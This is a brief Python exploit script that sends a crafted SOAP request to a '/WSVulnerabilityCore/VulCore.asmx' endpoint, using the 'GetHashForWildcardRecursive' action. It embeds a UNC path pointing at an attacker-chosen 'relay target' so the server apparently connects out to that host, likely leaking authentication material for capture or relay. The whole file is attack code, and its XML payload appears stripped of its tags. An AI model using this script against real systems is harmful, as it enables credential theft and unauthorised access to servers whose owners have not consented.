import argparse import requests import urllib3 urllib3.disable_warnings() XML_PAYLOAD = """ \\\\{}\\tmp\\file1.txt """ def exploit(url, relay_target): h = { "Content-Type": "text/xml", "Soapaction": "http://tempuri.org/GetHashForWildcardRecursive", } xml_payload = XML_PAYLOAD.format(relay_target) print(xml_payload) try: r = requests.post(f"{url}/WSVulnerabilityCore/VulCore.asmx", data=xml_payload, headers=h, verify=False, timeout=30) print(r.text) print(r.status_code) except TimeoutError: # Expected to timeout given it keeps connection open for process duration pass if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', help='The base URL of the target', required=True) parser.add_argument('-t', '--target', help='The target IP to reach out to', type=str, required=True) args = parser.parse_args() exploit(args.url, args.target)